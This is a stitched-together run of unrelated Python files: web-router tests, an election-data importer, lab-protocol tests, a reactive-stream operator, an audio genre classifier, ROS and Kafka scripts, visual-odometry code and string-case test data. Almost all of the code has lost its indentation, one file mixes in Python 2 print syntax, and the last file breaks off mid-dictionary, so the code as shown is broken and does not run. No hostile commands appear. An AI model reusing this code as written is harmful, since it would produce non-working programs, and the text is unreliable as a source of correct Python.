import pytest
from django.http import HttpResponse
from apirouter import APIRouter
from apirouter.exceptions import APIException
pytestmark = [pytest.mark.urls(__name__)]
def exception_handler(request, exc):
return HttpResponse(str(exc), status=400)
router = APIRouter(exception_handler=exception_handler)
@router.route("/string")
def handle_string(request):
return "OK"
@router.route("/dict")
def handle_dict(request):
return {"success": True}
@router.route("/list")
def handle_list(request):
return [1, 2, 3, 4, 5]
@router.route("/error")
def handle_error(request):
raise APIException(status_code=400, detail="Error")
urlpatterns = router.urls
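# The routes above return plain Python values (str, dict, list) or raise
# APIException; the tests below verify that APIRouter serializes those return
# values to JSON responses and dispatches APIException through the custom
# exception_handler registered on the router.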
def test_handle_string(client):
response = client.get("/string")
assert response.status_code == 200
assert response.json() == "OK"
def test_handle_dict(client):
response = client.get("/dict")
assert response.status_code == 200
assert response.json() == {"success": True}
def test_handle_list(client):
response = client.get("/list")
assert response.status_code == 200
assert response.json() == [1, 2, 3, 4, 5]
def test_handle_error(client):
response = client.get("/error")
assert response.status_code == 400
assert response.content == b"Error"
|
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "HAA"
addresses_name = "2021-03-25T12:55:41.884654/Democracy_Club__06May2021.tsv"
stations_name = "2021-03-25T12:55:41.884654/Democracy_Club__06May2021.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"100062456253", # 37 LONDON ROAD, COWPLAIN, WATERLOOVILLE
]:
return None
if record.addressline6 in [
"PO9 2DT",
"PO9 3EZ",
"PO8 8BB",
"PO10 7NH",
"PO10 7HN",
"PO8 9UB",
]:
return None
return super().address_record_to_dict(record)
|
from intent_parser.protocols.lab_protocol_accessor import LabProtocolAccessor
from intent_parser.protocols.labs.aquarium_opil_accessor import AquariumOpilAccessor
from intent_parser.protocols.labs.strateos_accessor import StrateosAccessor
from intent_parser.protocols.templates.experimental_request_template import ExperimentalRequest
from intent_parser.table.intent_parser_table_factory import IntentParserTableFactory
from intent_parser.table.measurement_table import MeasurementTable
import intent_parser.constants.intent_parser_constants as ip_constants
import unittest
class JellyFishProtocolOutputTest(unittest.TestCase):
def setUp(self):
aquarium_accessor = AquariumOpilAccessor()
strateos_accessor = StrateosAccessor()
lab_protocol_accessor = LabProtocolAccessor(strateos_accessor, aquarium_accessor)
self.opil_lab_template = lab_protocol_accessor.load_protocol_interface_from_lab('High-Throughput Culturing',
ip_constants.LAB_DUKE_HASE)
self.ip_table_factory = IntentParserTableFactory()
def test_size_of_load_experimental_request(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual(1, len(experimental_request.opil_experimental_requests))
def test_experimental_id_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('foo_id',
experimental_request.opil_experimental_requests[0].experiment_id)
def test_experimental_reference_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('IntentParserCopy_foo',
experimental_request.opil_experimental_requests[0].experiment_reference)
def test_experimental_reference_url_annotation(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_experimental_request()
self.assertEqual('https://docs.google.com/document/d/foo',
experimental_request.opil_experimental_requests[0].experiment_reference_url)
def test_size_of_load_sampleset_from_protocol_interface(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_sample_template_from_protocol_interface()
self.assertEqual(1, len(experimental_request.opil_sample_sets))
def test_size_of_load_sampleset_template_from_protocol_interface(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
experimental_request.load_sample_template_from_protocol_interface()
self.assertIsNotNone(experimental_request.sample_template)
self.assertEqual('http://aquarium.bio/htc_design',
experimental_request.sample_template.identity)
@unittest.skip("reparenting with existing id")
def test_size_of_create_subcomponents_from_template(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
self.assertEqual(4, len(experimental_request.sample_template.features))
@unittest.skip("reparenting with existing id")
def test_subcomponent_names(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
expected_subcomponent_names = ['Antibiotic', 'Inducer', 'Media', 'Strain']
for feature in experimental_request.sample_template.features:
self.assertTrue(feature.name in expected_subcomponent_names)
@unittest.skip("reparenting with existing id")
def test_size_of_sample_sets(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
self.assertEqual(2, len(experimental_request.opil_sample_sets))
@unittest.skip("reparenting with existing id")
def test_for_original_sample_set_by_identity(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
actual_sample_set_identities = [sample.identity for sample in experimental_request.opil_sample_sets]
self.assertTrue('http://aquarium.bio/culture_conditions' in actual_sample_set_identities)
@unittest.skip("reparenting with existing id")
def test_size_of_add_variable_features_from_measurement_intents(self):
experimental_request = ExperimentalRequest(ip_constants.AQUARIUM_NAMESPACE,
self.opil_lab_template,
'foo_id',
'IntentParserCopy_foo',
'https://docs.google.com/document/d/foo')
measurement_table = MeasurementTable(self._create_dummy_measurement_table())
measurement_table.process_table()
experimental_request.load_from_measurement_table(measurement_table)
experimental_request.load_sample_template_from_protocol_interface()
experimental_request.create_subcomponents_from_template()
experimental_request.load_sample_set(len(measurement_table.get_intents()))
experimental_request.add_variable_features_from_measurement_intents(measurement_table.get_intents())
self.assertEqual(2, len(experimental_request.opil_sample_sets))
sample_set1 = experimental_request.opil_sample_sets[0]
sample_set2 = experimental_request.opil_sample_sets[1]
self.assertEqual(3, len(sample_set1.variable_features))
self.assertEqual(3, len(sample_set2.variable_features))
def _create_dummy_measurement_table(self):
input_table = {'tableRows': [
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'measurement-type'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Strains'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Inducer'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Media'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Antibiotic'}}]}}]}
]},
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'FLOW'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'NOR00',
'textStyle': {'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/UWBF_6390/1'}}}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Sytox'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]}
]},
{'tableCells': [{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'FLOW'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'NOR00',
'textStyle': {'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/UWBF_6390/1'}}}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': 'Sytox'}}]}}]},
{'content': [{'paragraph': {'elements': [{'textRun': {
'content': '-1.0'}}]}}]}
]}
]
}
ip_table = self.ip_table_factory.from_google_doc({'table': input_table,
'startIndex': 0,
'endIndex': 100})
return ip_table
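# The dummy table above mimics the Google Docs API table payload consumed by
# Intent Parser: one header row (measurement-type, Strains, Inducer, Media,
# Antibiotic) followed by two identical FLOW measurement rows, wrapped into an
# intent parser table via IntentParserTableFactory.from_google_doc.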
def tearDown(self):
pass
if __name__ == "__main__":
unittest.main()
|
import matplotlib as mpl
mpl.use("Agg") # Must come after importing mpl, but before importing plt
import matplotlib.pyplot as plt
|
from typing import Callable
from rx3.core import Observable
def _skip_last(count: int) -> Callable[[Observable], Observable]:
def skip_last(source: Observable) -> Observable:
"""Bypasses a specified number of elements at the end of an
observable sequence.
This operator accumulates a queue with a length enough to store
the first `count` elements. As more elements are received,
elements are taken from the front of the queue and produced on
the result sequence. This causes elements to be delayed.
Args:
count: Number of elements to bypass at the end of the
source sequence.
Returns:
An observable sequence containing the source sequence
elements except for the bypassed ones at the end.
"""
def subscribe(observer, scheduler=None):
q = []
def on_next(value):
front = None
with source.lock:
q.append(value)
if len(q) > count:
front = q.pop(0)
if front is not None:
observer.on_next(front)
return source.subscribe_(on_next, observer.on_error, observer.on_completed, scheduler)
return Observable(subscribe)
return skip_last
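# Illustrative sketch (not part of rx3): the same bounded-queue idea in plain
# Python. The helper name `demo_skip_last` is hypothetical and only shows the
# mechanic: values are buffered until `count` of them are held back, earlier
# values are released in arrival order, and the final `count` values are never
# emitted.
from collections import deque

def demo_skip_last(values, count):
    buffer = deque()
    for value in values:
        buffer.append(value)
        if len(buffer) > count:
            # once more than `count` items are buffered, release the oldest one
            yield buffer.popleft()

# list(demo_skip_last([1, 2, 3, 4, 5], 2)) -> [1, 2, 3]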
|
import os
import timeit
import numpy as np
from collections import defaultdict
#from scikits.talkbox.features import mfcc
from python_speech_features import mfcc
from sklearn.metrics import precision_recall_curve, roc_curve
from sklearn.metrics import auc
from sklearn.model_selection import ShuffleSplit
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
import joblib
from utils1 import GENRE_DIR, GENRE_LIST
import scipy
import scipy.io.wavfile
# from utils import plot_roc, plot_confusion_matrix, GENRE_DIR, GENRE_LIST, TEST_DIR
# from ceps import read_ceps, create_ceps_test, read_ceps_test
from pydub import AudioSegment
genre_list = GENRE_LIST
clf = None
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Please run the classifier script first
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
def create_fft(wavfile):
sample_rate, song_array = scipy.io.wavfile.read(wavfile)
fft_features = abs(np.fft.fft(song_array[:30000]))  # magnitude of the FFT over the first 30000 samples
print(song_array)
base_fn, ext = os.path.splitext(wavfile)
data_fn = base_fn + ".fft"
np.save(data_fn, fft_features)
print(data_fn)
return data_fn
def create_ceps_test(fn):
"""
Creates the MFCC features from the test files,
saves them to disk, and returns the saved file name.
"""
sample_rate, X = scipy.io.wavfile.read(fn)
# X[X==0]=1
# np.nan_to_num(X)
ceps= mfcc(X)
bad_indices = np.where(np.isnan(ceps))
b=np.where(np.isinf(ceps))
ceps[bad_indices]=0
ceps[b]=0
base_fn, ext = os.path.splitext(fn)
data_fn = base_fn + ".ceps"
np.save(data_fn, ceps)
print "Written ", data_fn
return data_fn
def read_fft(test_file):
X = []
y = []
fft_features = np.load(test_file)
X.append(fft_features)
for label, genre in enumerate(genre_list):
y.append(label)
# for label, genre in enumerate(genre_list):
# # create UNIX pathnames to id FFT-files.
# genre_dir = os.path.join(base_dir, genre, "*.fft.npy")
# # get path names that math genre-dir
# file_list = glob.glob(genre_dir)
# for file in file_list:
# fft_features = np.load(file)
# X.append(fft_features)
# y.append(label)
# print(X)
# print(y)
return np.array(X), np.array(y)
def read_ceps_test(test_file):
"""
Reads the MFCC features from disk and
returns them in a numpy array.
"""
X = []
y = []
ceps = np.load(test_file)
num_ceps = len(ceps)
X.append(np.mean(ceps[int(num_ceps / 10):int(num_ceps * 9 / 10)], axis=0))
for label, genre in enumerate(genre_list):
y.append(label)
return np.array(X), np.array(y)
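# Note: with python_speech_features' defaults, mfcc() typically returns 13
# cepstral coefficients per frame, so each entry appended to X above is the
# per-coefficient mean over the middle 80% of frames (a length-13 vector),
# while y simply enumerates every genre label since the true genre of the test
# file is unknown here.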
def test_model_on_single_file(file_path):
clf = joblib.load('saved_models/model_mfcc_knn.pkl')
#clf = joblib.load('saved_models/model_mfcc_knn.pkl')
#clf = joblib.load('saved_models/model_fft_log.pkl')
X, y = read_ceps_test(create_ceps_test(file_path) + ".npy")
#X,y=read_fft(create_fft(test_file)+".npy")
#nsamples, nx, ny = X.shape
# X = X.reshape((nsamples,nx*ny))
# x=X[:30000]
# print(x.shape)
probs = clf.predict_proba(X)
print "\t".join(str(x) for x in genre_list)
print "\t".join(str("%.3f" % x) for x in probs[0])
probs=probs[0]
max_prob = max(probs)
for i,j in enumerate(probs):
if probs[i] == max_prob:
max_prob_index=i
print(max_prob_index)
predicted_genre = genre_list[max_prob_index]
print "\n\npredicted genre = ",predicted_genre
dictionary = dict(zip(probs, genre_list))
#print dictionary
for values in sorted(dictionary.items(), reverse=True):
print(values)
return predicted_genre
#probs.sort(reverse=True)
if __name__ == "__main__":
global traverse
for subdir, dirs, files in os.walk(GENRE_DIR):
traverse = list(set(dirs).intersection(set(GENRE_LIST)))
break
#test_file = "/home/dhruvesh/Desktop/dsp-final/genres/blues/blues.00000.wav"
test_file = "/home/dhruvesh/Desktop/dsp-final/country.wav"
# nsamples, nx, ny = test_file.shape
# test_file = test_file.reshape((nsamples,nx*ny))
# should predict genre as "ROCK"
predicted_genre = test_model_on_single_file(test_file)
|
#!/usr/bin/env python2
from __future__ import division, print_function, absolute_import
# Import ROS libraries
import roslib
import rospy
import rosbag
import numpy as np
import time
# Import class that computes the desired positions
from tf.transformations import euler_from_quaternion
from geometry_msgs.msg import TransformStamped, Twist
from sensor_msgs.msg import Image
from nav_msgs.msg import Odometry
from std_msgs.msg._Empty import Empty
class ROSBagNode(object):
def __init__(self):
"""Initialize the ROSControllerNode class"""
# subscriber
self.drone_pos_topic = '/gazebo_ground_truth_UAV0'
self.drone_pos_msg = Odometry()
self.payload_pos_topic = '/gazebo_ground_truth_payload'
self.payload_pos_msg = Odometry()
self.payload_est_topic = '/gazebo_estimate_payload_pose'
self.payload_est_msg = TransformStamped()
self.payload_est_rel_topic = '/gazebo_estimate_payload_pose_camera'
self.payload_est_rel_msg = TransformStamped()
self.image_topic = '/iris_0/bottom/image_raw'
self.image_msg = Image()
self.sub_drone = rospy.Subscriber(self.drone_pos_topic, Odometry, self.get_drone_pos)
self.sub_payload = rospy.Subscriber(self.payload_pos_topic, Odometry, self.get_payload_pos)
self.sub_payload_est = rospy.Subscriber(self.payload_est_topic, TransformStamped, self.get_payload_est)
self.sub_payload_est_rel = rospy.Subscriber(self.payload_est_rel_topic, TransformStamped, self.get_payload_est_rel)
self.sub_img = rospy.Subscriber(self.image_topic, Image, self.get_image)
# run the rosbag writer at 20 Hz
self.data_loop_frequency = 20.
# run the rosbag writer at the given frequency
self.rate = rospy.Rate(self.data_loop_frequency)
self.time_stamp = 0
self.bag_loc = '/home/consibic/Documents/rosbag_orig_controller/single_drone_payload_{0}.bag'.format(str(time.time()))
self.bag = rosbag.Bag(self.bag_loc, 'w')
def get_drone_pos(self, msg):
self.drone_pos_msg = msg
def get_payload_pos(self, msg):
self.payload_pos_msg = msg
def get_payload_est(self, msg):
self.payload_est_msg = msg
def get_payload_est_rel(self, msg):
self.payload_est_rel_msg = msg
def get_image(self, msg):
self.image_msg = msg
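# The subscriber callbacks above only cache the most recent message per topic;
# the loop below snapshots those cached messages and writes them to the bag at
# data_loop_frequency (20 Hz), so samples are recorded at a fixed rate rather
# than once per incoming message.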
if __name__ == '__main__':
rospy.init_node("ros_bag", disable_signals=True)
drone = ROSBagNode()
counter = 0
try:
while not rospy.is_shutdown():
drone.bag.write(drone.drone_pos_topic, drone.drone_pos_msg)
drone.bag.write(drone.payload_pos_topic, drone.payload_pos_msg)
drone.bag.write(drone.payload_est_topic, drone.payload_est_msg)
drone.bag.write(drone.payload_est_rel_topic, drone.payload_est_rel_msg)
# if counter == 100:
# drone.bag.write(drone.image_topic, drone.image_msg)
# counter = 0
# else:
# counter += 1
drone.rate.sleep()
finally:
drone.bag.close()
print('end')
|
import numpy as np
from unittest import mock
from unittest.mock import MagicMock, Mock, create_autospec
from napari_allencell_segmenter.view.workflow_steps_view import (
WorkflowStepsView,
IWorkflowStepsController,
SegmenterModel,
)
from aicssegmentation.workflow import WorkflowEngine
class TestWorkflowStepsView:
def setup_method(self):
model = SegmenterModel()
model.active_workflow = WorkflowEngine().get_executable_workflow("sec61b", np.ones((1, 1, 1)))
self._mock_controller: MagicMock = create_autospec(IWorkflowStepsController)
self._view = WorkflowStepsView(self._mock_controller)
self._view.load(model)
def test_show_workflow_diagram(self):
assert not self._view.window_workflow_diagram.isVisible()
self._view.btn_workflow_info.clicked.emit(False)
assert self._view.window_workflow_diagram.isVisible()
def test_run_all(self):
self._view.btn_run_all.clicked.emit(False)
self._mock_controller.run_all.assert_called_once()
def test_close_workflow_keep_layers(self):
self._view.btn_close_keep.clicked.emit(False)
self._mock_controller.close_workflow.assert_called_once()
@mock.patch("napari_allencell_segmenter.view.workflow_steps_view.QFileDialog.getSaveFileName")
def test_save_workflow(self, mock_dialog_save: Mock):
mock_dialog_save.return_value = ("/path/to/file.json", "filters")
self._view.btn_save_workflow.clicked.emit(False)
self._mock_controller.save_workflow.assert_called_once()
|
import uuid
import pytest
from citrine.informatics.workflows import PredictorEvaluationWorkflow
from citrine.resources.predictor_evaluation_workflow import PredictorEvaluationWorkflowCollection
from tests.utils.session import FakeSession, FakeCall
@pytest.fixture
def session() -> FakeSession:
return FakeSession()
@pytest.fixture
def collection(session) -> PredictorEvaluationWorkflowCollection:
return PredictorEvaluationWorkflowCollection(
project_id=uuid.uuid4(),
session=session,
)
@pytest.fixture
def workflow(collection: PredictorEvaluationWorkflowCollection,
predictor_evaluation_workflow_dict) -> PredictorEvaluationWorkflow:
return collection.build(predictor_evaluation_workflow_dict)
def test_basic_methods(workflow, collection):
assert "PredictorEvaluationWorkflow" in str(workflow)
assert workflow.evaluators[0].name == "Example evaluator"
def test_archive(workflow, collection):
collection.archive(workflow.uid)
expected_path = '/projects/{}/predictor-evaluation-workflows/archive'.format(collection.project_id)
assert collection.session.last_call == FakeCall(method='PUT', path=expected_path,
json={"module_uid": str(workflow.uid)})
def test_restore(workflow, collection):
collection.restore(workflow.uid)
expected_path = '/projects/{}/predictor-evaluation-workflows/restore'.format(collection.project_id)
assert collection.session.last_call == FakeCall(method='PUT', path=expected_path,
json={"module_uid": str(workflow.uid)})
def test_delete(collection):
with pytest.raises(NotImplementedError):
collection.delete(uuid.uuid4())
def test_create_default(predictor_evaluation_workflow_dict: dict,
workflow: PredictorEvaluationWorkflow):
session = FakeSession()
session.set_response(predictor_evaluation_workflow_dict)
collection = PredictorEvaluationWorkflowCollection(
project_id=uuid.uuid4(),
session=session
)
default_workflow = collection.create_default(predictor_id=uuid.uuid4())
assert default_workflow.dump() == workflow.dump()
|
"""
.. warning:: `logging` package has been renamed to `loggers` since v0.7.0 and will be removed in v0.9.0
"""
from pytorch_lightning.loggers.comet import CometLogger # noqa: F403
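# Minimal usage sketch under the renamed package (assumes typical CometLogger
# keyword arguments; adjust to your Comet project):
#
#     from pytorch_lightning.loggers import CometLogger
#     comet_logger = CometLogger(api_key="...", project_name="my-project")
#
# Importing from `pytorch_lightning.loggers` directly avoids this deprecated
# `pytorch_lightning.logging` shim.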
|
import json
import logging
from django.core.management import BaseCommand
from runner.config import KAFKA_TRANS_TOPIC, METRICS_WHITELIST, KAFKA_PREP_TOPIC
from runner.constants import VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS
from runner.utils.kafka import KafkaExporter, init_consumer_and_subscribe
logger = logging.getLogger('metric_collector')
def metric_collector():
"""Connects on Kafka Bus and collects metrics for active vTranscoders and spectators. """
# Initialize consumer and exporter
consumer = init_consumer_and_subscribe(topic=KAFKA_TRANS_TOPIC,
group_id_suffix='IMMERSIVE_MEDIA_PREPROCESSING')
kafka_exporter = KafkaExporter()
# Metrics Dict
metrics_per_resource_id = {}
for msg in consumer:
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
except json.JSONDecodeError as jde:
logger.error(jde)
continue
# Check if VIM tag is the required
vim_tag = payload['mano']['vim']['tag']
if vim_tag not in [VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS]:
logger.debug('VIM tag was {}. Ignoring ...'.format(vim_tag))
continue
# Check if metric is in whitelist
if payload['metric']['name'] not in METRICS_WHITELIST:
logger.debug('Metric was {}. Ignoring ...'.format(payload['metric']['name']))
continue
# Get metric details
mano_vdu_id = payload['mano']['vdu']['id']
metric = payload['metric']
metric_name = metric['name']
metric_value = metric['value']
metric_timestamp = metric['timestamp']
# If the metrics refer to spectators
if vim_tag == VTRANSCODER_3D_SPECTATORS:
client_id = payload['spectator']['client_id']
group_id = payload['spectator']['group_id']
resource_id = (client_id, group_id, mano_vdu_id)
logger.debug('Received metric [{}] for resource [{}].'.format(metric_name, resource_id))
if resource_id in metrics_per_resource_id.keys():
if metrics_per_resource_id[resource_id][metric_name] is None:
metrics_per_resource_id[resource_id][metric_name] = metric_value
if None not in metrics_per_resource_id[resource_id].values():
payload.pop('metric')
payload['timestamp'] = metric_timestamp
payload['measurements'] = metrics_per_resource_id[resource_id]
logger.info('Collected measurements for resource [{}]: `{}`'
.format(resource_id, payload['measurements']))
kafka_exporter.publish_message(KAFKA_PREP_TOPIC, payload)
metrics_per_resource_id[resource_id] = dict.fromkeys(metrics_per_resource_id[resource_id], None)
else:
logger.debug('Resource [{}] has now been recorded.'.format(resource_id))
metrics_per_resource_id[resource_id] = {
'bitrate_aggr': None,
'bitrate_on': None,
'framerate_aggr': None,
'framerate_on': None,
'latency_aggr': None,
'working_fps': None,
'output_data_bytes': None,
'theoretic_load_percentage': None
}
metrics_per_resource_id[resource_id][metric_name] = metric_value
# If the metrics refer to vTranscoders
if vim_tag == VTRANSCODER_3D:
for resource in metrics_per_resource_id.keys():
if resource[-1] == mano_vdu_id:
logger.debug('Set metric [{}] for resource [{}].'.format(metric_name, resource))
metrics_per_resource_id[resource][metric_name] = metric_value
class Command(BaseCommand):
def handle(self, *args, **options):
metric_collector()
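# Worked trace of the collection logic above: for each spectator resource_id the
# dict starts with every whitelisted metric set to None; each incoming message
# fills in one metric value; once no value is None, the combined payload is
# published to KAFKA_PREP_TOPIC under a `measurements` key and the dict is reset
# to all-None via dict.fromkeys, ready for the next collection cycle.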
|
import cv2
import numpy as np
import random
import matplotlib.pyplot as plt
import os
from ReadCameraModel import ReadCameraModel
from UndistortImage import UndistortImage
import copy
from numpy.linalg import matrix_rank
import pandas as pd
l = []
frames = []
pathimage="/home/arjun/Desktop/VOM/Oxford_dataset/stereo/centre/"
pathmodel="/home/arjun/Desktop/VOM/Oxford_dataset/model/"
def cvfunctions(distort1, distort2, k):
kp1, des1 = sift.detectAndCompute(distort1, None)
kp2, des2 = sift.detectAndCompute(distort2, None)
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)
search_params = dict(checks=50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
matches = flann.knnMatch(des1, des2, k=2)
pointsmatched = []
pointsfrom1 = []
pointsfrom2 = []
for i, (s, p) in enumerate(matches):
if s.distance < 0.5 * p.distance:
pointsmatched.append(s)
pointsfrom2.append(kp2[s.trainIdx].pt)
pointsfrom1.append(kp1[s.queryIdx].pt)
pointsfrom1 = np.int32(pointsfrom1)
pointsfrom2 = np.int32(pointsfrom2)
F, mask = cv2.findFundamentalMat(pointsfrom1, pointsfrom2, cv2.FM_RANSAC)
pointsfrom1 = pointsfrom1[mask.ravel() == 1]
pointsfrom2 = pointsfrom2[mask.ravel() == 1]
E = k.T @ F @ k
retval, R, t, mask = cv2.recoverPose(E, pointsfrom1, pointsfrom2, k)
return R, t
def cameraMatrix(file):
frames1 = []
for frames in os.listdir(file):
frames1.append(frames)
fx, fy, cx, cy, G_camera_frames, LUT = ReadCameraModel(pathmodel)
K = np.array([[fx, 0, cx], [0, fy, cy], [0, 0, 1]])
return K, LUT
def Homogenousmatrix(R, t):
h = np.column_stack((R, t))
a = np.array([0, 0, 0, 1])
h = np.vstack((h, a))
return h
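# Homogenousmatrix(R, t) stacks R (3x3) and t (3x1) into [R | t] and appends the
# row [0, 0, 0, 1], giving the 4x4 rigid-body transform that the loop below
# chains frame-to-frame (homo1 = homo1 @ homo2) to accumulate the camera pose.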
sift = cv2.xfeatures2d.SIFT_create()
# pathimage="/home/arjun/Desktop/VOM/Oxford_dataset/stereo/centre/"
# pathmodel="/home/arjun/Desktop/VOM/Oxford_dataset/model/"
file = pathimage
k, LUT = cameraMatrix(pathimage)
for frames1 in os.listdir(file):
frames.append(frames1)
frames.sort()
homo1 = np.identity(4)
t1 = np.array([[0, 0, 0, 1]])
t1 = t1.T
for index in range(19, len(frames)-1):
print(frames[index], index)
img1 = cv2.imread(pathimage + str(frames[index]), 0)
colorimage1 = cv2.cvtColor(img1, cv2.COLOR_BayerGR2BGR)
undistortedimage1 = UndistortImage(colorimage1,LUT)
gray1 = cv2.cvtColor(undistortedimage1,cv2.COLOR_BGR2GRAY)
img2 = cv2.imread(pathimage+ str(frames[index + 1]), 0)
colorimage2 = cv2.cvtColor(img2, cv2.COLOR_BayerGR2BGR)
undistortedimage2 = UndistortImage(colorimage2,LUT)
gray2 = cv2.cvtColor(undistortedimage2,cv2.COLOR_BGR2GRAY)
gray1 = gray1[200:650, 0:1280]
gray2 = gray2[200:650, 0:1280]
R, T = cvfunctions(gray1, gray2, k)
homo2 = Homogenousmatrix(R, T)
homo1 = homo1 @ homo2
p1 = homo1 @ t1
plt.scatter(p1[0][0], -p1[2][0], color='r')
l.append([p1[0][0], -p1[2][0]])
df = pd.DataFrame(l, columns = ['X', 'Y'])
df.to_excel('ocvcoordinates.xlsx')
plt.savefig('ocv.png')
plt.show()
|
from unittest import TestCase
from parameterized import parameterized
import case_conversion
ACRONYMS = ["HTTP"]
ACRONYMS_UNICODE = ["HÉÉP"]
CASES = [
"camel",
"pascal",
"snake",
"dash",
"dash",
"const",
"const",
"dot",
]
CASES_PRESERVE = [
"separate_words",
"slash",
"backslash",
]
VALUES = {
"camel": "fooBarString",
"pascal": "FooBarString",
"snake": "foo_bar_string",
"dash": "foo-bar-string",
"const": "FOO_BAR_STRING",
"dot": "foo.bar.string",
"separate_words": "foo bar string",
"slash": "foo/bar/string",
"backslash": "foo\\bar\\string",
}
VALUES_UNICODE = {
"camel": "fóoBarString",
"pascal": "FóoBarString",
"snake": "fóo_bar_string",
"dash": "fóo-bar-string",
"const": "FÓO_BAR_STRING",
"dot": "fóo.bar.string",
"separate_words": "fóo bar string",
"slash": "fóo/bar/string",
"backslash": "fóo\\bar\\string",
}
VALUES_SINGLE = {
"camel": "foo",
"pascal": "Foo",
"snake": "foo",
"dash": "foo",
"const": "FOO",
"dot": "foo",
"separate_words": "foo",
"slash": "foo",
"backslash": "foo",
}
VALUES_SINGLE_UNICODE = {
"camel": "fóo",
"pascal": "Fóo",
"snake": "fóo",
"dash": "fóo",
"const": "FÓO",
"dot": "fóo",
"separate_words": "fóo",
"slash": "fóo",
"backslash": "fóo",
}
VALUES_ACRONYM = {
"camel": "fooHTTPBarString",
"pascal": "FooHTTPBarString",
"snake": "foo_http_bar_string",
"dash": "foo-http-bar-string",
"const": "FOO_HTTP_BAR_STRING",
"dot": "foo.http.bar.string",
"separate_words": "foo http bar string",
"slash": "foo/http/bar/string",
"backslash": "foo\\http\\bar\\string",
}
VALUES_ACRONYM_UNICODE = {
"camel": "fooHÉÉPBarString",
"pascal": "FooHÉÉPBarString",
"snake": "foo_héép_bar_string",
"dash": "foo-héép-bar-string",
"const": "FOO_HÉÉP_BAR_STRING",
"dot": "foo.héép.bar.string",
"separate_words": "foo héép bar string",
"slash": "foo/héép/bar/string",
"backslash": "foo\\héép\\bar\\string",
}
PRESERVE_VALUES = {
